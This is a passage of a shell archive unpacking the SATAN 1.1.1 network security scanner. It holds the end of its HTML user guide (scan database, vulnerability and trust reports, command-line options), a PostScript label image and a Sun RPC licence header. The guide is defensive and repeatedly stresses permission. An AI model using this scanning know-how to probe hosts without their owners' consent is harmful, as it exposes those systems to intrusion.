Xinformation from other databases or scans. For this reason it is a good
Xidea to choose a database <i>before</i> collecting data. All queries
Xwill go to the in-core database. New data collection results, etc.
Xwill go into the currently selected on-disk database.
X
X<p>
XMerging a database concatenates the contents of the chosen on-disk
Xdatabase to the in-core information. Although care
Xmust be taken to have enough physical memory to contain all the databases,
XSATAN becomes more and more interesting as more information is
Xcombined, because more correlation, trust, and patterns can
Xbe detected. In addition, when large databases from different but
Xconnected (users log in from one site to another, or important
Xdata is being shared) sites are placed together, <strong>better</strong>
Xinformation can be gotten for both sites. If you know friendly neighboring
Xsystem administrators, instead of asking for permission to scan their
Xsite, exchange your latest SATAN database with each other, and help
Xeach other out. It would be interesting to put together hundreds of
Xthousands of hosts from the Internet and see what happens (although the
Xmemory and CPU speed required to process this amount of data would
Xbe formidable!)
X
X<p>
X<A NAME="gathering-data"><H3>Gathering Data</H3></A>
XGathering information about hosts is very easy when using SATAN - too
Xeasy sometimes, because it follows lines of trust that are often hidden
Xfrom casual observation, and you'll soon find it scanning networks and
Xhosts that you had no idea were connected to your net. As an
Xintellectual or learning exercise this is wonderful, but many sites take
Xa dim view of you probing (or "attacking", as they'll claim) their site
Xwithout prior permission. So don't do it.
X<p>
XThe easiest and safest way to gather it is by simply selecting a
Xtarget host that you'd like to know more about and then probe that host
X(and the subnet as well, if you wish) with the default settings:
Xno host-to-subnet expansion, and a maximum
Xproximity level of zero (see the <a href=satan.cf.html> config/satan.cf</a>
X(SATAN configuration) file for more on this.)
X<p>
XSee the <a href="../tutorials/first_time/scanning.html"> tutorial</a>
Xon how to scan a target for the first time.
X
X<p>
X<A NAME="looking"><H3>Looking at and understanding the results</H3></A>
XEasy to use, hard to describe. That's how the SATAN <I>Reporting and
XAnalysis</I> works. There are three broad categories (vulnerabilities,
Xinformation, and trust), each with
Xfundamental differences in how they approach and analyze the data
Xgathered from scanning. However, since
Xso much information is tied together with the hypertext, you can start from
Xany of these categories and find the same information but with a
Xdifferent emphasis or display on certain parts of the information. Most
Xqueries will present the user with an index that facilitates movement
Xwithin that query type - the amount of information can get quite large -
Xand a link that will lead the user back to the Table of Contents. In
Xaddition, vulnerabilities have links to a description of the problem,
Xincluding what it is, what the implications are with respect to
Xsecurity, as well as how to fix it. If a CERT advisory applies to this
Xparticular problem then there is a link to that as well.
X<OL>
X<li><a href="#vulnerabilities"><STRONG>Vulnerabilities</STRONG></a>.
XThis is what most people think of when they think of SATAN - what/where
Xare the weak points of the host/network.
X<li><a href="#hostinfo"><STRONG>Host Information</STRONG></a>. Very
Xvaluable information - this can show where the servers are, what the
Ximportant hosts are, breakdown the network into subnets, organizational
Xdomains, etc. In addition, you can query about any individual host
Xhere.
X<li><a href="#trust"><STRONG>Trust</STRONG></a>. SATAN can follow
Xthe web of trust between systems - trust through remote logins,
Xtrust by sharing file systems.
X</OL>
X
X<a name="vulnerabilities"><STRONG>Vulnerabilities</STRONG></a>
X<p>
XThere are three basic ways of looking at the vulnerability results of
Xyour scan:
X<UL>
X<li>Approximate Danger Level. All of the probes generate a basic level
Xof danger if they find a potential problem; this sorts all the problems
Xby severity level (e.g. the most serious level compromises root on the
Xtarget host, the least allows an unprivileged file to be remotely read.)
X<li>Type of Vulnerability. This simply shows all the types of
Xvulnerabilities found in the probe, plus a corresponding list of hosts
Xthat fall under that vulnerability.
X<li>Vulnerability Count. This shows which hosts have the most problems,
Xby sheer number of vulnerabilities found by the probe.
X</UL>
XTry looking at all of the different ways of looking at any
Xvulnerabilities found by the probe to see which is most intuitive or
Xinformative to you; after using the tool for some time, it becomes
Xeasier to learn which type of query is the best for the current
Xsituation.
X
X<p>
X<a name="hostinfo"><STRONG>Host Information</STRONG></a>
X<p>
XAn enormous amount of information can be gained by examining the various
Xsubcategories of this section - remember, the more intensive the SATAN
Xprobe, the more information will be gathered. Typically this will show
Xeither the numbers of hosts that fall under the specific category with
Xhypertext links to more specific information about the hosts or the
Xactual list of hosts (which can be sorted into different orders on the
Xfly). If there is a host listed with a red dot
X(<IMG SRC="../dots/reddot.gif" ALT="*">) next to it, that means the
Xhost has a vulnerability that could compromise it.
XNote that if SATAN reports a problem, it means the problem is
X<strong>possibly</strong>
Xpresent. The presence of Wietse's TCP wrapper, a packet filter, firewall,
Xother security measures, or just incomplete information or assumptions may
Xmean that what SATAN "sees" is not the real picture.
X
XA black dot
X(<IMG SRC="../dots/blackdot.gif" ALT="-">) means that no vulnerabilities
Xhave been found for that particular host yet.
XNote that a black dot next to the host does <strong>NOT</strong> mean
Xthat the host has no security holes. It only means that SATAN didn't
Xfind any; scanning at a higher level or additional probes might find
Xsome further information, and examining the SATAN database to see if
Xprobes were timing out rather than failing might mean the probes should be
Xrun a second time. Clicking on links
Xwill give you more information on that host, network, piece of
Xinformation, or vulnerability, just as expected.
X<p>
XThe categories are:
X<UL>
X<li>Class of Service. This shows the various network services that the
Xcollected group of probed hosts offer - anonymous FTP, WWW, etc.
XGathered by examining information garnered by <I>rpcinfo</I> and by
Xscanning TCP ports.
X<li>System Type. Breaks down the probed hosts by the hardware type
X(Sun, SGI, Ultrix, etc.); this is further subdivided by the OS version,
Xif possible to ascertain. This is inferred by
Xthe various network banners of <I>ftp</I>, <I>telnet</I>, and
X<I>sendmail</I>.
X<li>Internet Domain. Shows the various hosts broken down into DNS
Xdomains. This is very useful when trying to understand which domains
Xare administered well or are more important (either by sheer numbers or
Xby examining the numbers of servers or key hosts, etc.)
X<li>Subnet. A subnet (as far as SATAN is concerned) is a block of up
Xto 256 adjacent network addresses, all within the last octet of the IP
Xaddress. This is the most common way of breaking up small
Xorganizations, and can be useful for showing the physical location or
Xconcentration of hosts in larger systems.
X<li>Host name. Allows a <STRONG>query</STRONG> of the current database
Xof probe information about a specific host.
X</UL>
X
X<p>
X<A NAME="trust"><strong>Trust</strong></A>
X<p>
XThis is a way of
Xfinding out the most important hosts on the network; the more hosts that
Xtrust a host (e.g. depend on some service, have logged in from the host,
Xetc.), the more interesting it is to break-in from the outside, for once
Xbroken into an intruder could either break into or at least have a much
Xbetter chance to break into the dependent hosts as well.
X
X<p>
X<A NAME="tricky-implications"><H3>Hints, Further Tricky Security Implications,
Xor Getting the Big Picture</H3></A>
XIt's just as important to understand what the SATAN reports <I>don't</I>
Xshow as well as what they show. It can be very comforting to see SATAN
Xreturning a clean bill of health (i.e. no vulnerabilities found), but
Xthat will often merely mean that more probing should be done. Here are
Xsome general suggestions on how to get the most out of SATAN; this
Xrequires a fairly good understanding of the
X<a href=satan.cf.html> config/satan.cf</a> (SATAN configuration) file:
X<UL>
X<li>Probe your own hosts from an <STRONG>EXTERNAL</STRONG> site! This
Xis a <STRONG>necessity</STRONG> for firewalls, and a very good idea
Xfor sites in general.
X<li>Probe your hosts as heavily as possible, and use a high
X$proximity_descent value (2 or 3 are good.)
X<li>Use a very low $max_proximity_level - it is almost never necessary
Xto use more than 2. However, if you're behind a firewall (e.g.
Xhave no direct IP connectivity from the host that is running the SATAN
Xscan (Be <STRONG>VERY</STRONG> careful if you're running SATAN behind a
Xfirewall that allows inside users to have direct IP connectivity to hosts
Xon the Internet! You are essentially on the Internet as far as SATAN
Xis concerned), you can set this higher. There should be almost no reason
Xto ever set this to anything beyond single digits.
X
X<li>Start with light probes and probe more heavily when you see
Xpotential danger spots. Keep tight control over what you scan - don't
Xscan other people's hosts without permission!
X<li>Use the <I>$only_attack_these</I> and <I>$dont_attack_these</I>
Xvariables to control where your attacks are going.
X<li>Collect all of your user's <I>.rhosts</I> files and make a list of
Xall external hosts found there. Get permission from the system administrators
Xof those remote sites and run SATAN against <STRONG>all</STRONG> of them.
X<li>If you have a host that a lot of other hosts trust or have critical
Xhosts, make sure that you scan these hosts with a "heavy" scan to help
Xensure that no one can gain access to these. Unless politically
Ximpossible, scan the entire subnet of these key hosts as well, because
Xonce on a subnet, it's very easy to break into other hosts on the same
Xsubnet.
X</UL>
X<p>
X<A NAME="command-line"><H3>The Command-line Interface</H3></A>
XFor those without a good HTML browser, for those die-hard Un*x types
Xthat despise GUI's, or for simply firing off probes when you don't want
Xto leave a several megabyte memory hog (your HTML viewer) doing
Xessentially nothing, all of the probing functionality is accessible from
Xyour favorite Un*x shell prompt. However, you <STRONG>cannot</STRONG>
Xexamine the reports, do queries, or any of a number of other nifty
Xthings by simply using the command line. This is because the reporting
Xprograms were written to emit HTML code, and even the two hard-core Un*x
Xhackers who wrote this program love (and hate, we must admit) what HTML
Xcan do.
X<p>
XHere are the command line options, what they do, and what SATAN
Xvariables they correspond to.
XFurther explanations
Xof the variables that are mentioned here can be found in the
X<a href=satan.cf.html> config/satan.cf</a> (SATAN configuration) file.
X<p>
XSATAN enters interactive mode when no target host is specified.
X<p>
X<dl compact>
X<DT>-a <dd> Attack level (0=light, 1=normal, 2=heavy). Variable:
X<i>$attack_level</i>.
X<p><dt>-c 'name = value; name = value...' <dd> Change SATAN variables.
XUse this to overrule configuration variables that do not have their
Xown command-line option.
X<p><dt>-d <dd> SATAN database to read already collected data from,
Xand to save new data to. Variable: <i>$satan_data</i>.
X<p><dt>-i <dd> Ignore already collected data.
X<p><dt>-l <dd> Maximal proximity level. Variable: <i>$max_proximity_level</i>.
X<p><dt>-o list <dd> Scan only these hosts, domains or networks. Variable:
X<i>$only_attack_these</i>.
X<p><dt>-O list <dd> Don't scan these hosts, domains or networks. Variable:
X<i>$dont_attack_these</i>.
X<p><dt>-s <dd> Enable subnet expansions. Variable:
X<i>$attack_proximate_subnets</i>.
X<p><dt>-S status_file <dd> SATAN status file (default <i>status_file</i>).
XVariable: <i>$status_file</i>.
X<p><dt>-t level <dd> Timeout length (0 = short, 1 = medium, 2 = long). Variable:
X<i>$timeout</i>.
X<p><dt>-v <dd> Turn on debugging output (to stdout). Variable: <i>$debug</i>.
X<p><dt>-V <dd> Print version number and terminate.
X<p><dt>-z <dd> Continue with attack level of zero when the level would become negative. The scan continues until
Xthe maximal proximity level is reached.
X<p><dt>-Z <dd> Opposite of the <i>-z</i> option.
X</dl>
X
X<p>
X<hr>
X<a href="satan_reference.html"> Back to the Reference TOC/Index</a>
X

X</BODY>
X</HTML>
END_OF_FILE

if test 16171 -ne `wc -c <'satan-1.1.1/html/docs/user_interface.html'`; then
echo shar: \"'satan-1.1.1/html/docs/user_interface.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/user_interface.html'
fi
if test -f 'satan-1.1.1/satan.ps' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/satan.ps'\"
else
echo shar: Extracting \"'satan-1.1.1/satan.ps'\" $15123 characters$
sed "s/^X//" >'satan-1.1.1/satan.ps' <<'END_OF_FILE'
X%!
X%! print on Avery #05499, yellow glow labels
X
X%% <</Policies <</PageSize 2 /MediaType 0>> >>
X%% setpagedevice
X%% <</PageSize [290 480]>>
X%% setpagedevice
X
X0.24 0.24 scale
X/picstr 32 string def
X331.5 906.5 translate
X%%2037 1337 scale
X%%div 5
X407 267 scale
X
X/data <ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
Xffffffffe0fffffffffffffffffffffffffffffffffffff9ffffffffffffffff
Xffffffffffffffffffe0fffffffffffffffffffffffffffffff8000000043fff
Xffffffffffffffffffffffffffffe0ffffffffffffffffffffffffffffffc000
X00000023ffffffffffffffffffffffffffffffe0ffffffffffffffffffffffff
Xffffe00000000000007fffffffffffffffffffffffffffffe0ffffffffffffff
Xfffffffffffffe00000000000000003fffffffffffffffffffffffffffe0ffff
Xffffffffffffffffffffffe00000000000000000001fffffffffffffffffffff
Xffffe0fffffffffffffffffffffffffe000000000000000000000fffffffffff
Xffffffffffffffe0ffffffffffffffffffffffffe00000000000000000000000
Xffffffffffffffffffffffffe0ffffffffffffffffffffffff00000000000000
X00000000007fffffffffffffffffffffffe0fffffffffffffffffffffff80000
X0000000000000000000000ffffffffffffffffffffffe0ffffffffffffffffff
Xffffc0000000000000000000000000007fffffffffffffffffffffe0ffffffff
Xfffffffffffffc00000000000000000000000000001fffffffffffffffffffff
Xe0ffffffffffffffffffff0000000000000000000000000000001fffffffffff
Xffffffffffe0fffffffffffffffffffe0000000000000000000000000000003f
Xffffffffffffffffffffe0fffffffffffffffffffc0000000000000000000000
X000000003fffffffffffffffffffffe0fffffffffffffffffff8000000000000
X0000000000000000007fffffffffffffffffffffe0ffffffffffffffffffc000
X00000000000000000000000000007fffffffffffffffffffffe0ffffffffffff
Xfffffc000000000000007c18000000000000007fffffffffffffffffffffe0ff
Xffffffffffffffc0000000000000fffffffe3000000000007fffffffffffffff
Xffffffe0ffffffffffffffff0000000000003ffffffffffffc000000007fffff
Xffffffffffffffffe0ffffffffffffffff00000000000fffffffffffffffc000
X00007fffffffffffffffffffffe0fffffffffffffff800000000003fffffffff
Xfffffff80000007fffffffffffffffffffffe0ffffffffffffffe00000000003
Xfffffffffffffffffff000007fffffffffffffffffffffe0ffffffffffffffe0
X000000007fffffffffffffffffffff0000ffffffffffffffffffffffe0ffffff
Xffffffffc000000003ffffffffffffffffffffffc000ffffffffffffffffffff
Xffe0ffffffffffffff000000001ffffffffffffffffffffffff000ffffffffff
Xffffffffffffe0fffffffffffffc00000000fffffffffffffffffffffffff801
Xffffffffffffffffffffffe0fffffffffffffc00000003ffffffffffffffffff
Xfffffffe01ffffffffffffffffffffffe0fffffffffffff00000000fffffffff
Xffffffffffffffffff81ffffffffffffffffffffffe0ffffffffffff80000000
X3fffffffffffffffffffffffffffc3ffffffffffffffffffffffe0ffffffffff
Xff80000007ffffffffffffffffffffc0fffffff3ffffffffffffffffffffffe0
Xfffffffffffe0000000f83ffffffffffffffffffc00fffffffffffffffffffff
Xffffffffe0fffffffffffc0000007e00ffffffffffffffffffc0007fffffffff
Xffffffffffffffffffe0fffffffffff8000001fe03ffffffffffffffffff8000
X1fffffffffffffffffffffffffffe0fffffffffff0000007f800ffffffffffff
Xffffff800007ffffffffffffffffffffffffffe0ffffffffffe000001ff8007f
Xffffffffffffffff800001ffffffffffffffffffffffffffe0ffffffffff8000
X007ff8001fffffffffffffffff800001ffffffffffffffffffffffffffe0ffff
Xffffff800001fff8001fffffffffffffffff8000007fffffffffffffffffffff
Xffffe0fffffffffe000007fffc000f8fffffffffffffff0000000fffffffffff
Xffffffffffffffe0fffffffffc00001ffffc00060fffffffffffffff00000007
Xffffffffffffffffffffffffe0fffffffff000007ffffc000007ffffffffffff
Xff00000003ffffffffffffffffffffffffe0fffffffff00000fffff8000007ff
Xffffffffffff00000001ffffffffffffffffffffffffe0ffffffffe00003ffff
Xf8000007ffff3fffe7ffff00000000ffffffffffffffffffffffffe0ffffffff
X800007fffff000000fffff3fff83fffe000000007fffffffffffffffffffffff
Xe0ffffffff80001fffffe000003ffffc00fc01ffff000000001fffffffffffff
Xffffffffffe0ffffffff00003fffffc000007ffffc00f801ffff000000000fff
Xffffffffffffffffffffe0fffffffe0000fffffe000001fffffe00f800ffff00
X0000000fffffffffffffffffffffffe0fffffffe0001fffff8000007fffffe00
Xf000ffff8000000003ffffffffffffffffffffffe0fffffffc0007ffffc00000
X0ffffffe00e000ffffe600000000ffffffffffffffffffffffe0fffffffc0007
Xffff8000001ff81ffe004000fffffff00000007fffffffffffffffffffffe0ff
Xfffff0001fffff0000001fe000fe0000007ffffffc0000003fffffffffffffff
Xffffffe0fffffff0001ffffe0000001ff0000f0000007ffffffe0000001fffff
Xffffffffffffffffe0ffffffe0007fffff0000003ff0000f0000007ffffffff0
X00000fffffffffffffffffffffe0ffffffe000ffffff0000003ff0000f000000
X7ffffffff0000003ffffffffffffffffffffe0ffffffc001ffffffc000003fc0
X000f0000007fffffffff800003ffffffffffffffffffffe0ffffff0003ffffff
Xe07e003fc0000f0004003ffffffffff00001ffffffffffffffffffffe0fffffe
X0007fffffffffe007fc00007001e003ffffffffff00000ffffffffffffffffff
Xffe0fffffe000ffffffffffc007f800007001e003ffffffffff000007fffffff
Xffffffffffffe0fffffe001ffffffffffc003f000007003e003ffffffffffc00
X007fffffffffffffffffffe0fffffe003ffffff81ffc001f000007003f003fff
Xfffffffe00003fffffffffffffffffffe0fffffc007ffffff001fc003f000007
X003f001fffffffffff00001fffffffffffffffffffe0fffff8007fffffc0003e
X003e002007003f001fffffffffff80001fffffffffffffffffffe0fffff800ff
Xffff00003f003e006007007f801fffffffffffe0000fffffffffffffffffffe0
Xfffff801ffffff00003f003e006007007f801fffffffffffe00007ffffffffff
Xffffffffe0fffff003fffffe00003f001e006003807f801ffffffffffff00003
Xffffffffffffffffffe0fffff003fff3fe00003f001e00f003807f000fffffff
Xfffff80003ffffffffffffffffffe0ffffe007ff03fc00003f001c00f003807f
X800ffffffffffffc0001ffffffffffffffffffe0ffffe00fff83fc00001f001c
X00f003807fc00fffffffffffff0001ffffffffffffffffffe0ffffc00ffe01f8
X00001f801c00f803c03fe00fffffffffffff8000ffffffffffffffffffe0ffff
X801ffc01f800001f801800f803c03f800fffffffffffff8000ffffffffffffff
Xffffe0ffff801ff800f800801f001800f803c03f800fffffffffffffc0007fff
Xffffffffffffffe0ffff003ff000f801801f801c00f801c03f8007ffffffffff
Xffe0007fffffffffffffffffe0fffe003fc000f001801f801c00f801803f8007
Xfffffffffffff0007fffffffffffffffffe0fffe007f80007003801f800c00f0
X01c03f8007fffffffffffff0003fffffffffffffffffe0fffc007f0000700380
X1f800c00f001c03f8007fffffffffffff8003fffffffffffffffffe0fffc00ff
X00007007801f800400e000e03fe007fffffffffffffc003fffffffffffffffff
Xe0fffc00ff0000f007801fc00c006000e03ff003fffffffffffffe001fffffff
Xffffffffffe0fff801fe0001c007c01fc00c004000e01ff003fffffffffffffe
X000fffffffffffffffffe0fff803fc0003c007c01fc00c000000e01ff003ffff
Xffffffffff000fffffffffffffffffe0fff803fc0007c007c01fc00e000000f0
X1ff803ffffffffffffff000fffffffffffffffffe0fff00ff8000f800fc00fc0
X0e000000f01ffe0fffffffffffffff000fffffffffffffffffe0fff007f8001f
X800fc00fc00e000000f03ffffffffe7fffffffffc00fffffffffffffffffe0ff
Xe007f8003f000fc00fc00f000200fffffffffff00fffffffffc00fffffffffff
Xffffffe0ffe00ff8007f000f800fc00f000700fffffffffff007ffffffffe007
Xffffffffffffffffe0ffe00ff000ff000f800fc00f000700fffffffffff800ff
Xffffffe003ffffffffffffffffe0ffc00ff000ff0007000fc00f800f007fffff
Xfffff800fffffffff003ffffffffffffffffe0ffe00ffc00ff0006000fe00f80
X0f00fffffffffff000fffffffff003ffffffffffffffffe0ffc00ffc007f8004
X000fe00f001f007ffffffffff000fffffffff803ffffffffffffffffe0ffc01f
Xfc003fc000000fc00fe03f807fffffffffe000fffffffff803ffffffffffffff
Xffe0ffc01ffe001fe000000fe00ff07fc0fffffffffff000fffffffff803ffff
Xffffffffffffe0ffc01fff000ff000000fe00ffffffffffff81ffff801ffffff
Xfff801ffffffffffffffffe0ff803fff8007f000300ff00ffffffffffff87fff
Xf001fffffffffc01ffffffffffffffffe0ff803fff8003f800700ff91fffffff
Xffffe07ffff001ffcffffffc01ffffffffffffffffe0ff803fff8001f800700f
Xffffffffffffffc03ffff001ff81fffffc01ffffffffffffffffe0ff803fff30
X00fc00f00fffffffffffffffe01ffff801ff800ffffe01ffffffffffffffffe0
Xff803ffff800fc00f00fffffffffffffffe00ffff001ff0007fffe01ffffffff
Xffffffffe0ff807fffe0007e01f80fffffffffffffffc007ffc001fc0003fffe
X01ffffffffffffffffe0ff807fffe4007f03f80fffffffffffffffc007fff001
Xf80001fffe01ffffffffffffffffe0ff807ffffe007f07f80fffffffffffffff
Xc007ff8001f80001fffe01ffffffffffffffffe0ff807ffffe007ffffc0fffff
Xffffffffffe00fffc001f80001fffe01ffffffffffffffffe0ff007ffffc007f
Xffffffffffffffffffffe00fffc003f00101fffe01ffffffffffffffffe0ff80
X7ffffc007ffffffffffffffffffffff03fff0003f00101fffc01ffffffffffff
Xffffe0ff807ffff8007ffffffffffffffffff8fff81ffc0003f00301fffc01ff
Xffffffffffffffe0ff80fffff0007fffffffffffffffffc03ffe3ff80003e006
X01fffc01ffffffffffffffffe0ff807fffe000ffffffffffffffffff801fffff
X900003e00601fffc01ffffffffffffffffe0ff80ffffe000ffffffffffffffff
Xff001f81ff800003c00c01fffc03ffffffffffffffffe0ff007fff8001ffffff
Xcffffffffffe000f007f000003c00c03fffc03ffffffffffffffffe0ff807fff
X8001ffffff87fffffffff8000f003f000003800803fff803ffffffffffffffff
Xe0ff807fff0003fffffe00fffffffff8000f001f000003800007fff003ffffff
Xffffffffffe0ff007fff0007fffffc00fffffffff8000f001f00000380000fff
Xf003ffffffffffffffffe0ff007fff000ffffff800ffffffffe0000f001e0000
X0380001fffe003ffffffffffffffffe0ff007fff001ffffff800780fffffe000
X0f001e00000380001fffe003ffffffffffffffffe0ff007fff803ffffffe00f8
X01ffffc0001f003e0020030000ffffc007ffffffffffffffffe0ff807fffc0ff
Xfffffe00f001f03f80003f003c0060030007ffffe007ffffffffffffffffe0ff
X803fffe1ffffffff81f001e01f8000fe003800e007001fffffe00fffffffffff
Xffffffe0ff803fffffffffffffc3f001800f0001fe003801e007003f7fffc00f
Xffffffffffffffffe0ff803fffffffffffffcff001000f0003fc007801e00700
X7e3fffc00fffffffffffffffffe0ff803fffffffffffff8fe0000007000ffc00
X7001800700fc07ffc01fffffffffffffffffe0ffc03ffffffffffffc07f00000
X07000ffe007003c00700f803ffc01fffffffffffffffffe0ffc01fffffffffff
Xf001f0000007001ffc007003c00700f803ff801fffffffffffffffffe0ffc01f
Xfffffffffff800f0000007801ffe007003c007007001ff801fffffffffffffff
Xffe0ffe00ffffffffffff800f0000007801ffe007003c006004001ff003fffff
Xffffffffffffe0ffe00ffffffffffff000f0000007800ffc007003c006000003
Xff803fffffffffffffffffe0ffe00ffffffffffff800f0000007c007fc007007
X8007000007ff003fffffffffffffffffe0ffe007fffffffffff800f0000007e0
X07fc0060078007000007fe007fffffffffffffffffe0ffe007fffffffffff800
Xf0006007f003fc00e007800780001ffe007fffffffffffffffffe0fff003ffff
Xfffffff001f000e007f001fe00e007000fc0003ffe00ffffffffffffffffffe0
Xfff003fffffffffff001f001e007fc00f800c006000fe0007ffe00ffffffffff
Xffffffffe0fff801fffffffffff001f001e007fe00fc00e000000fe000fffc01
Xffffffffffffffffffe0fff801fffffffffff001f003e007fe007c00e000000f
Xf001fffc01ffffffffffffffffffe0fff800fffffffffff001e003e007ff003c
X00f000000ffc03fff803ffffffffffffffffffe0fffc00fffffffffff001e003
Xe007fe003c00e000000ffffffff803ffffffffffffffffffe0fffc007fffffff
Xfff001e007f007ff801c00f000200ffffffff807ffffffffffffffffffe0fffc
X003ffffffffff001e007f003ff001c01f000600ffffffff007ffffffffffffff
Xffffe0fffe003fffffffffe003e007e003fe001c01f000c00ffffffff00fffff
Xffffffffffffffe0fffe001ffffffffff003e007e003fe001c01f800c00fffff
Xffe01fffffffffffffffffffe0ffff000fffffffffe003e00fe003fc001c01f8
X01c00fffffffe01fffffffffffffffffffe0ffff000fffffffffe003e00fe003
Xe0003c01f803c01fffffffc03fffffffffffffffffffe0ffff8007fffffffff0
X03f00f8003e0003c01fc07e01fffffff803fffffffffffffffffffe0ffff8003
Xffffffffe003e00fc003e0003c01ffffc01fffffff007fffffffffffffffffff
Xe0ffffc003ffffffffe003e00fe003e0007c01fffff01ffffffe00ffffffffff
Xffffffffffe0ffffc001ffffffffe003f00fe003c000fc03fffffc1ffffffe01
Xffffffffffffffffffffe0ffffe000ffffffffe003f00fe001c000fc07ffffff
Xfffffffc01ffffffffffffffffffffe0ffffe0007fffffffe003f00ff0018001
Xfffffffffffffffff003ffffffffffffffffffffe0fffff0003fffffffe007e0
X0ff0018003ffffffffffffffffe003ffffffffffffffffffffe0fffff8001fff
Xfffff007e00ff0018007ffffffffffffffffc007ffffffffffffffffffffe0ff
Xfffc000ffffffff007f00ff801800fffffffffffffffff000fffffffffffffff
Xffffffe0fffffc0007ffffffe007f00ff801801fffffffffffffffff000fffff
Xffffffffffffffffe0fffffe0003ffffffe007f00ff801c03fffffffffffffff
Xfe001fffffffffffffffffffffe0ffffff0001fffffff007fc1ff001e07fffff
Xfffffffffff0003fffffffffffffffffffffe0ffffff0000fffffff007fffff8
X01fffffffffffffffffff0007fffffffffffffffffffffe0ffffff80003fffff
Xf00ffffffc01fffffffffffffffffff0007fffffffffffffffffffffe0ffffff
Xc0001ffffff00ffffffe01ffffffffffffffffffe000ffffffffffffffffffff
Xffe0ffffffe0000ffffff00fffffff03ffffffffffffffffffc001ffffffffff
Xffffffffffffe0fffffff00007fffff80fffffffffffffffffffffffffffc001
Xffffffffffffffffffffffe0fffffff00001fffffc0fffffffffffffffffffff
Xffffff8003ffffffffffffffffffffffe0fffffff80000ffffff1fffffffffff
Xfffffffffffffffc0007ffffffffffffffffffffffe0fffffffc00003fffffff
Xfffffffffffffffffffffffff8000fffffffffffffffffffffffe0fffffffe00
X000fffffffffffffffffffffffffffffffe0001fffffffffffffffffffffffe0
Xffffffff000007ffffffffffffffffffffffffffffffc0003fffffffffffffff
Xffffffffe0ffffffff800000fffffffffffffffffffffffffffffc0000ffffff
Xffffffffffffffffffe0ffffffffe000003ffffffffffffffffffffffffffff8
X0001ffffffffffffffffffffffffe0fffffffff000000fffffffffffffffffff
Xffffffffe00003ffffffffffffffffffffffffe0fffffffff8000007ffffffff
Xffffffffffffffffff800007ffffffffffffffffffffffffe0fffffffffc0000
X00fffffffffffffffffffffffffc00001fffffffffffffffffffffffffe0ffff
Xfffffe0000003ffffffffffffffffffffffff000003fffffffffffffffffffff
Xffffe0ffffffffff80000007ffffffffffffffffffffff800000ffffffffffff
Xffffffffffffffe0ffffffffffc0000001ffffffffffffffffffffff000001ff
Xffffffffffffffffffffffffe0fffffffffff00000003fffffffffffffffffff
Xf8000007ffffffffffffffffffffffffffe0fffffffffff00000000fffffffff
Xffffffffff8000000fffffffffffffffffffffffffffe0fffffffffffc000000
X00fffffffffffffffff00000007fffffffffffffffffffffffffffe0ffffffff
Xfffe000000001ffffffffffffff800000001ffffffffffffffffffffffffffff
Xe0ffffffffffff8000000000fffffffffffc8000000007ffffffffffffffffff
Xffffffffffe0ffffffffffffe00000000007fffffff810000000001fffffffff
Xffffffffffffffffffffe0fffffffffffff000000000001fe07c000000000000
X3fffffffffffffffffffffffffffffe0fffffffffffffc000000000000000000
X0000000000ffffffffffffffffffffffffffffffe0ffffffffffffffc0000000
X00000000000000000013ffffffffffffffffffffffffffffffe0ffffffffffff
Xffe00000000000000000000000007fffffffffffffffffffffffffffffffe0ff
Xfffffffffffff8000000000000000000000001ffffffffffffffffffffffffff
Xffffffe0fffffffffffffffc000000000000000000000007ffffffffffffffff
Xffffffffffffffffe0ffffffffffffffff80000000000000000000003fffffff
Xffffffffffffffffffffffffffe0ffffffffffffffffe0000000000000000000
X01ffffffffffffffffffffffffffffffffffe0ffffffffffffffffff80000000
X00000000000fffffffffffffffffffffffffffffffffffe0ffffffffffffffff
Xfff80000000000000000ffffffffffffffffffffffffffffffffffffe0ffffff
Xffffffffffffff800000000000000fffffffffffffffffffffffffffffffffff
Xffe0fffffffffffffffffffff0000000000000ffffffffffffffffffffffffff
Xffffffffffffe0ffffffffffffffffffffffe0000000007fffffffffffffffff
Xffffffffffffffffffffffe0ffffffffffffffffffffffffff00007fffffffff
Xffffffffffffffffffffffffffffffffe0ffffffffffffffffffffffffffffff
Xffffffffffffffffffffffffffffffffffffffffffe0ffffffffffffffffffff
Xffffffffffffffffffffffffffffffffffffffffffffffffffffe00000000000> def
X
X/satan {291 191 1 [ 291 0 0 -191 0 191 ] { data } image } def
X
X/dx .95 def
X/dy 1.490 def
X
X-.713 -3.13 translate
X
Xsatan
Xdx 0 translate satan
Xdx 0 translate satan
Xdx 2 mul neg dy translate satan
Xdx 0 translate satan
Xdx 0 translate satan
Xdx 2 mul neg dy translate satan
Xdx 0 translate satan
Xdx 0 translate satan
Xdx 2 mul neg dy translate satan
Xdx 0 translate satan
Xdx 0 translate satan
Xdx 2 mul neg dy translate satan
Xdx 0 translate satan
Xdx 0 translate satan
X
X%%/#copies 10 def
X
Xshowpage
END_OF_FILE
if test 15123 -ne `wc -c <'satan-1.1.1/satan.ps'`; then
echo shar: \"'satan-1.1.1/satan.ps'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/satan.ps'
fi
if test -f 'satan-1.1.1/src/rpcgen/rpc_parse.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/rpcgen/rpc_parse.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/rpcgen/rpc_parse.c'\" $9251 characters$
sed "s/^X//" >'satan-1.1.1/src/rpcgen/rpc_parse.c' <<'END_OF_FILE'
X/* @(#)rpc_parse.c 2.1 88/08/01 4.0 RPCSRC */
X/*
X * Sun RPC is a product of Sun Microsystems, Inc. and is provided for
X * unrestricted use provided that this legend is included on all tape
X * media and as a part of the software program in whole or part. Users
X * may copy or modify Sun RPC without charge, but are not authorized
X * to license or distribute it to anyone else except as part of a product or
X * program developed by the user.
X *
X * SUN RPC IS PROVIDED AS IS WITH NO WARRANTIES OF ANY KIND INCLUDING THE
X * WARRANTIES OF DESIGN, MERCHANTIBILITY AND FITNESS FOR A PARTICULAR
X * PURPOSE, OR ARISING FROM A COURSE OF DEALING, USAGE OR TRADE PRACTICE.
X *
X * Sun RPC is provided with no support and without any obligation on the
X * part of Sun Microsystems, Inc. to assist in its use, correction,
X * modification or enhancement.
X *
X * SUN MICROSYSTEMS, INC. SHALL HAVE NO LIABILITY WITH RESPECT TO THE
X * INFRINGEMENT OF COPYRIGHTS, TRADE SECRETS OR ANY PATENTS BY SUN RPC
X * OR ANY PART THEREOF.
X *
